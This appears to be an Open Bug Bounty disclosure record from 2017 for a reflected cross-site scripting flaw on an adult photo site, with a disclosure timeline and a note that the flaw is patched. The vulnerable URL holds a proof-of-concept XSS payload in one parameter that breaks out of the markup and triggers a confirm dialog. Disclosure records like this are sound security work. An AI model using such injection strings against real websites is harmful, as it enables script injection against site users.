newbienudes.com XSS vulnerability

2017-01-29T22:49:00
ID OBB:210013
Type openbugbounty
Reporter Random_Robbie
Modified 2017-02-27T07:14:00

Description

Vulnerable URL:
http://www.newbienudes.com/photos/viewPhoto.asp?ID=14220810&AT;=C&AV;=&OB;=D&PT;=P&p0;=14220813%27"--!>confirm`OPENBUGBOUNTY`%3C/Script /K/>&p1;=14220814&p2;=14220815&p3;=14220816&p4;=14220818&p5;=14220819&p6;=14220821&p7;=14220822&p8;=14220824&p9;=14220825&n0;=14220808&n1;=14220807&n2;=14220806&n3;=14220803&n4;=14220800&n5;=14220798&n6;=14220796&n7;=14220794&n8;=14220793
Details:

Description| Value
---|---
Patched:| Yes, at 13.02.2017
Latest check for patch:| 13.02.2017 21:10 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 77499
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 29 January, 2017 22:49 GMT
Vulnerability existence verified and confirmed| 30 January, 2017 07:11 GMT
Generic security notifications sent to website owner| 30 January, 2017 07:11 GMT
Notification sent to subscribers (without technical details)| 30 January, 2017 10:17 GMT
Vulnerability details disclosed by researcher| 27 February, 2017 07:14 GMT